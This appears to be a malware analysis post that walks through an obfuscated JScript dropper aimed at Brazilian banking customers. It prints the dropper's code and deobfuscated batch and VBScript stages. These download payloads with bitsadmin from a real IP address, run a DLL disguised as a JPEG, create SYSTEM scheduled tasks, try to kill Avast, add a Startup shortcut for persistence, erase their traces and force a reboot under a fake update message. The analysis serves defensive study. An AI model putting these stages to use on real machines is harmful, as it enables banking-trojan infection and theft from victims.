R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("::hfIOaw0n92VYEtD74p7a1NBD0dzBrP0eDzyiSbBswn8Gqfz5n2dNmYxWuUE0QVCthTr8EuF2U9B3ZhoquA2UQzP8qcs7Ql1YEXFv7Ui2npdEp5L6rvqUtl25FUBNizoo6r8kjCk7dwAlW72gPf1ZKJItZzQAX9nVQaRzjJ7kpjasX201njm29Fib6K6NH0Vg8Q5RMS7mdjBROfmuL5d98Snd2a00h2GqOb0mBHzgBEsfft97BNfbws8tBI1xSpu7DnBTJTRJ6UH54LVR694l8GnkU9AM4Q34wq8l89QMW2pJGLTrlL9hkRzzgrTsK87YKQp67ooh8zb62bBIbtkZ6UYKRYheiw11lI9UV660W60Gf8ILCfk8l8rhIgLmXTa7B2ifbB24f9N8EGN7abSZMIHQjS311nn8CpQ4Khh4OhDN0NA270AO6G7BGtYl4od1K8wP8h7P7l9ygwoy2cDM2GmloEosgRG2Q4Ee3in53TqJrZqk5GhXHDkU23bb2077EnA4Z87ek19i4MpydWIQBjR3m4exIvauOct41LhAF2szV4133uuv2x56yZFeoCc6D205g3cH8mZzjD6qp87E3Q6L");


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo xTsNBe0z1.Run "explorer.exe">> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::ECXdJ2Zs0PdNNOB9H5T18WiHh6VYWLG35anj8ZdI6pfxDsEJvofKvNH1qgTYgCzEgOgh57Gv251UunAWE19v0S9rvBLr7xHR9Dn1UzJu053LxBt7s0tkLYVpLQ4YVOJdNrwwiZOxyK9CwCz410EGbNnLctV7TAaK1wj2QnZMOrY00Va74I2f1n5i9fThy50ELHstPrTpwFo12B5EqO3v80jlNYVvl9L6Sim31UU1LY4ZkfhRa0epI8GL5f3I4E8sSgpjrEYSF0WS316u6SSFRKIY1uwOL1Ys1ld65zuTqzeeuR8gFztP84z1bm68rcPU2duz485m6UkpVtM0h3HxDE52Nf3X6fa9tA2IY85zbTVoGuL6G2kYA8XM003F7rkwvRjYm7bxcJw31qVy8nV781k24pF8O54r9l0TtyGqU894a4D81z1PeBIVV58scL4SH");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo Set xTsNBe0z1 = Nothing>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("::G6HS2JRkQ5LctFS91hWgrUa3OGVxHYaMCcvVs5D7jRv6H78K8lwV3MO0A5SLakp1tX4by4qncgFaQA2ZyIL9A0aKZWp1HDSQhdLX2baDa4Yv37X4SB0czjNXW8VP9Mp0o9vX8e1R5XMCMxkEXZ374vZxKYmxTt5LO268g2pD5VJyc6Wtl1aerbBmVpikFpbY2L9woN3kwWmUPvQsxZS5Oz8O402FDUV7HJqX64OT08aaGJZEbFFZM8h7W08383F98vyv26X4kn96s2wtPmavv68rKAVrA5vSRSYYNl7I293cVjRSnMM26AXBGYDlnjU4CDEcVe6g42xDo28yGGbtxSzYEemjMwlXm4U2CPu9d3q1f53zB6rvM0Odntycm9JIB7uUjAEfNI2XhdQUAB0JZFF5FQOgIayH119Mz7I2pcYJ97Zwnb6VKC90");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo Wscript.exit>> "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine("::C29b9P7L7K0XA949NVBLMU895jYcV5XTE66auhf0uDW80zP2MSJ1uSxFZhRtCxe619aCIcBQZx48MoZIp3l67u5F6kHxtpI81P07YjhTDzTnqCfMHv8Uv9az3iT1Qkutbcv5cHcQEVeA1cMs5oMO7oCs19sObCn4xu1N9GOD2K5BsegNqPSeD6RFM62bbd0Eu3LqE49q9o3g8q5du7eoT10C9TG35cX48Z0x5TuCrkN");


R9cs39N4.WriteLine('echo set So309D2GXyWt65iW8WL = WScript.CreateObject("WScript.Shell") > "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo ErAO7tz49 = "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\n9y7zrblxW3.lnk" >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');


R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");

R9cs39N4.WriteLine('echo set QQgIu3CAWkdYJ2X5 = So309D2GXyWt65iW8WL.CreateShortcut(ErAO7tz49) >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");
R9cs39N4.WriteLine("::eek:oxaithF3hbe9U5q5Sf5My4kx7JqK669w2yxCJECIW13Iz9DPCFepB2n23E64ocWNDY4075A8Uld86yqJj4kV86Kqr69PLp97q1EBDe2C0W2pwIeKzTRQ6ttC4MjJ6AhyJ049wos8hiv3IY3cH5s04o0zmVbF5ilowXuGZHh8ZmaE6o6c8VpsZwijZY8dQ823VNyfyt1IYzhQ1SWCLd");

R9cs39N4.WriteLine('echo QQgIu3CAWkdYJ2X5.TargetPath = "%LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs" >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('echo QQgIu3CAWkdYJ2X5.Save >> "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");


R9cs39N4.WriteLine('cscript "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');


R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\yQoN9p28y.vbs"');



R9cs39N4.WriteLine('DEL "' + eUKbZgnryU + '"');



R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\h4zL4J4Nf6.jpg"');


R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\n2x8Fb8oeJ.zip"');


R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\kdbJe8gRfp.zip"');



R9cs39N4.WriteLine('DEL "%LOCALAPPDATA%\\Temps\\U34B2X0Cwk5dk2lfzCJ.zip"');



R9cs39N4.WriteLine('TIMEOUT 180 & Erase "%0" & shutdown -r -f -c "Atualizando Microsoft Windows Install."');


R9cs39N4.Close();

var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(eUKbZgnryU);

R9cs39N4.WriteLine('set qgvYsX = WScript.CreateObject("WScript.Shell")');


R9cs39N4.WriteLine('qgvYsX.Run "%comspec% /c ' + j5tq1MW730 + '", 0, false');

R9cs39N4.Close();

2-) Let's see the whole structure :

2-1) first part :

// creates the ActiveX objects : manipulation of files + run

var Nv3RU90Lt5ZG = new ActiveXObject("Scripting.FileSystemObject");
var j3Tezo2PL9ok = new ActiveXObject("wscript.shell");
// Folder that shows if one of the security tools for banking is installed
var p4KBH5u64vNz = "gbplugin";

=> Folder present if the plugin for banking access is installed (Brazilian bank)
var go6xt1m8jIZKV = "scpbrad";

=> Folder present if scpbradguard.exe, for banking access, is installed (Brazilian bank)
=> Banco Bradesco S.A.

var lg9Ba493sIk = false;
var CYjK6el1 = false;


// Folders where to test the presence of "gbplugin" and "scpbrad"

L2jl14qQMb = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES(x86)%");

=> "C:\Program Files (x86)"
FKQRd91EjgEw8 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%PROGRAMFILES%");
=> "C:\Program Files" or "C:\Program Files (x86)"
2-2) Tests of security tools for banking :

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb)) {

if (Nv3RU90Lt5ZG.FolderExists(L2jl14qQMb + "\\" + p4KBH5u64vNz))

=> "C:\Program Files (x86)\gbplugin"
=> security tool for Brazilian bank

{

lg9Ba493sIk = true;
}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))
{

=> "C:\Program Files\scpbrad"
=> security tool for : BANCO BRADESCO (Brazilian bank)

CYjK6el1 = true;
}

if (lg9Ba493sIk == false && CYjK6el1 == false)

{
WScript.Echo("Error Unknow");
WScript.Quit();
}
} else {

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + p4KBH5u64vNz))
{

=> "C:\Program Files\gbplugin" ?
lg9Ba493sIk = true;
}

if (Nv3RU90Lt5ZG.FolderExists(FKQRd91EjgEw8 + "\\" + go6xt1m8jIZKV))

{
=> "C:\Program Files\scpbrad" ?

CYjK6el1 = true;
}

if (lg9Ba493sIk == false && CYjK6el1 == false)
{

WScript.Echo("Error Unknow");
WScript.Quit();
}
}

The script quits if none of the above banking security tools was found.

2-3) Test to see if the script was run with elevated permission :

MjldoqNZhAokOT3DA = j3Tezo2PL9ok.ExpandEnvironmentStrings("%SYSTEMROOT%") + "/e0HbvG3WG";

=> "C:\Windows\e0HbvG3WG"
=> if the script was run without arguments, it tests whether it was already run with runas (elevated permission), by the presence of the e0HbvG3WG file !
if (WScript.Arguments.Count() == 0) {

var Koz6CN1gH = new ActiveXObject("Shell.Application");

while (!Nv3RU90Lt5ZG.FileExists(MjldoqNZhAokOT3DA)) {

=> if the "C:\Windows\e0HbvG3WG" file doesn't exist => Loop

Koz6CN1gH.ShellExecute("wscript.exe", "\"" + WScript.ScriptFullName + "\"" + " /a4gyFwxb6St0QHv1n", "", "runas", 1);

=> script run again with argument : /a4gyFwxb6St0QHv1n
=> with elevated permission


WScript.Sleep(10000);

// wait 10 s
}
WScript.Sleep(20000);

//wait 20 s

j3Tezo2PL9ok.Run('%SYSTEMROOT%\\notepad.exe', 0, false);

=> Shell.run
=> "C:\Windows\notepad.exe"

=> opens notepad and quits
WScript.Quit();
}

Here, we are sure that the script runs with elevated permission.

2-4) Creation of Folders and files :

try
{

Nv3RU90Lt5ZG.CreateFolder(j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps");

=> tries to create the folder : Temps
=> Example :
C:\Users\DardiM\AppData\Local\Temps
} catch (zc2Gj6bZLhiem8)
{}

var z4cwrnc7 = Nv3RU90Lt5ZG.CreateTextFile(MjldoqNZhAokOT3DA, true);

=> creates "C:\Windows\e0HbvG3WG"
z4cwrnc7.Close();
IDxyPFq3XxAOsK4kEF = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\UQv5OyjGx1f.bat";

=> C:\Users\DardiM\AppData\Local\Temps\UQv5OyjGx1f.bat
j5tq1MW730 = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\v5KT1ENIDUVo.bat";

=> C:\Users\DardiM\AppData\Local\Temps\v5KT1ENIDUVo.bat
eUKbZgnryU = j3Tezo2PL9ok.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\\Temps\\ngx2uq.vbs";

=> C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs
Here, the script is ready to create 3 files and run one of them

- UQv5OyjGx1f.bat
- v5KT1ENIDUVo.bat
- ngx2uq.vbs
2-4) Creation of files and run :
First file creation :
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(IDxyPFq3XxAOsK4kEF);

=> C:\Users\DardiM\AppData\Local\Temps\UQv5OyjGx1f.bat
R9cs39N4.WriteLine("@echo off");

R9cs39N4.WriteLine("TIMEOUT 5");

etc,...

All parts of UQv5OyjGx1f.bat are written, but many of them are useless lines, there only to obfuscate.

=> They all begin with "::" or "echo '"
I will show later the real content of all files, with all the useless parts removed.
R9cs39N4.Close();

j3Tezo2PL9ok.Run('%comspec% /c ' + IDxyPFq3XxAOsK4kEF + ' bitsadmin schtasks cmd rundll32', 0, false);

=> run the UQv5OyjGx1f.bat with ' bitsadmin schtasks cmd rundll32' as parameter
var aspas = "'";

Second file creation

var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(j5tq1MW730);

=> v5KT1ENIDUVo.bat
R9cs39N4.WriteLine("@echo off");
...
R9cs39N4.WriteLine("bitsadmin /complete NZrk3biH7Y");
...
...
R9cs39N4.Close();

Third File creation:
var R9cs39N4 = Nv3RU90Lt5ZG.CreateTextFile(eUKbZgnryU);

=> C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs
R9cs39N4.WriteLine('set qgvYsX = WScript.CreateObject("WScript.Shell")');

R9cs39N4.WriteLine('qgvYsX.Run "%comspec% /c ' + j5tq1MW730 + '", 0, false');

=> j5tq1MW730 : C:\Users\DardiM\AppData\Local\Temps\v5KT1ENIDUVo.bat
R9cs39N4.Close();
END OF THE SCRIPT
2-5 ) Explanations :

The .js file :

- creates UQv5OyjGx1f.bat

- runs UQv5OyjGx1f.bat with parameters : ' bitsadmin schtasks cmd rundll32'

- creates v5KT1ENIDUVo.bat

- creates ngx2uq.vbs

UQv5OyjGx1f.bat :

bitsadmin : %1 in the batch line

"BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress".


This batch file is used to download the zip files and one dll file hidden behind a .jpg extension.

Then :

%1.exe /SetNotifyCmdLine NZrk3biH7Y "%comspec%" "cmd /c cscript.exe C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs"
%1 /Resume NZrk3biH7Y
Erase "%0"

At the end, the batch file runs ngx2uq.vbs, which runs v5KT1ENIDUVo.bat

Look at the spoiler part !
@echo off
TIMEOUT 5
%1 /Reset
%1 /Create NZrk3biH7Y
%1 /SetNotifyFlags NZrk3biH7Y 1
%1 /SetMinRetryDelay NZrk3biH7Y 240
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/0/32/%RANDOM%/kTKDPtX/piMS7pp/%RANDOM%/zgQd/%RANDOM%/GD7x8/K49M8Sm7.ODI %LOCALAPPDATA%\Temps\kdbJe8gRfp.zip
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/0/64/%RANDOM%/WBwH/b1yWkJ/fLb3/inY89g5/%RANDOM%/%RANDOM%/xU6Qx/AwH0iooyj.FPz %LOCALAPPDATA%\Temps\kdbJe8gRfp.zip
)
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/1/32/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/nyXRj/r0A850g.uIc %LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/1/64/%RANDOM%...%/%RANDOM%/%RANDOM%/%RANDOM%/wRDk/xE8p8aF.Bew %LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip
)
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/2/32/%RANDOM%/IYAk4i/%RANDOM%/Pb9EK/R1fJ3z/UK7U/XmG6J78a.ZaP %LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/2/64/%RANDOM%...RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/vf5tTr.xVh %LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip
)
IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/3/32/%RANDOM%/%RANDOM%/DY9e/FMgj/In7t9.Kaf %LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/3/64/%RANDOM%/%RANDOM%/THCo6/%RANDOM%/Y7DD/%RANDOM%/dFFSx0/ghi8iuh.iWy %LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg
)
%1.exe /SetNotifyCmdLine NZrk3biH7Y "%comspec%" "cmd /c cscript.exe C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs"
%1 /Resume NZrk3biH7Y
Erase "%0"
v5KT1ENIDUVo.bat :

- Completes the job initialized by UQv5OyjGx1f.bat

- Tries to kill 'AvastSvc.exe' with nogui ProcessHacker.exe (nogui : hide GUI)

- Extracts all the useful files to %windir%

- InfDefaultInstall.exe %WINDIR%\setup.inf

- use echo with > and >> : redirections
- example :

echo On Error Resume Next> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"

=> create the file and write On Error Resume Next

echo set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"

=> appends (add) WScript.CreateObject("WScript.Shell") to m7hSw7Y2f.vbs


There are also a lot of parts that add useless comments to m7hSw7Y2f.vbs, like :

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");
=> allows to obfuscate a bit more
=> it creates m7hSw7Y2f.vbs with some contents

- use echo with redirection >> yQoN9p28y.vbs

=> then add its content :

set So309D2GXyWt65iW8WL = WScript.CreateObject("WScript.Shell")
ErAO7tz49 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\n9y7zrblxW3.lnk"
set QQgIu3CAWkdYJ2X5 = So309D2GXyWt65iW8WL.CreateShortcut(ErAO7tz49)
QQgIu3CAWkdYJ2X5.TargetPath = "C:\Users\fredd\AppData\Local\Temps\m7hSw7Y2f.vbs"
QQgIu3CAWkdYJ2X5.Save

=> when this file is run, it creates a shortcut in the Startup folder, targeting m7hSw7Y2f.vbs
- runs yQoN9p28y.vbs

- deletes all temporary files used :

DEL "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
DEL "C:\Users\fredd\AppData\Local\Temps\ngx2uq.vbs"
DEL "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg"
DEL "%LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip"
DEL "%LOCALAPPDATA%\Temps\kdbJe8gRfp.zip"
DEL "%LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip"
- reboots the PC :

TIMEOUT 180 & Erase "%0" & shutdown -r -f -c "Atualizando Microsoft Windows Install."
-r : Reboots after shutdown.
-f : Forces running applications to close.
-c " message " : Specifies a message to be displayed :

=> "Atualizando Microsoft Windows Install."
(remember it targets Brazilians)
Look at the spoiler part !
@echo off
bitsadmin /complete NZrk3biH7Y
SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:01 /TN "{D69166F8-5801-4516-85C9-A9AB6BF664E2}" /TR "%WINDIR%\MSSevices32.exe" /RU SYSTEM
SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:30 /TN "{26B75C81-B815-4466-9DC5-5C91B370BADA}" /TR "cmd /c tasklist | find /i "'AvastSvc.exe'">null || %WINDIR%\555500.bat nogui ProcessHacker.exe" /RU SYSTEM
TIMEOUT 5
TIMEOUT 5
rundll32 "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg",#2 "%LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip" "%WINDIR%"
rundll32 "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg",#2 "%LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip" "%WINDIR%"
TIMEOUT 5
InfDefaultInstall.exe %WINDIR%\setup.inf
TIMEOUT 5
SCHTASKS /RUN /TN "{D69166F8-5801-4516-85C9-A9AB6BF664E2}"
TIMEOUT 10
rundll32 "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg",#2 "%LOCALAPPDATA%\Temps\kdbJe8gRfp.zip" "%LOCALAPPDATA%\Temps"
TIMEOUT 5
echo On Error Resume Next> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo WScript.Sleep(90000)>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo xTsNBe0z1.Run("rundll32 %LOCALAPPDATA%\Temps\tykeo13w.iqld,#2 VEi8sQm")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo RAj9WSg = ".">> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set UPOfAz2RnR = GetObject("winmgmts:" ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo "{impersonationLevel=impersonate}!\\" ^& RAj9WSg ^& "\root\cimv2")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(039)^&Chr(103)^&Chr(098)^&Chr(112)^&Chr(115)^&Chr(118)^&Chr(046)^&Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo For Each gQ0GVRiRzf6e0 in h50KAQ29554T>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Next>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(039)^&Chr(101)^&Chr(120)^&Chr(112)^&Chr(108)^&Chr(111)^&Chr(114)^&Chr(101)^&Chr(114)^&Chr(046) ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo For Each gQ0GVRiRzf6e0 in h50KAQ29554T>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Next>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo xTsNBe0z1.Run "explorer.exe">> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set xTsNBe0z1 = Nothing>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Wscript.exit>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo set So309D2GXyWt65iW8WL = WScript.CreateObject("WScript.Shell") > "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo ErAO7tz49 = "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\n9y7zrblxW3.lnk" >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
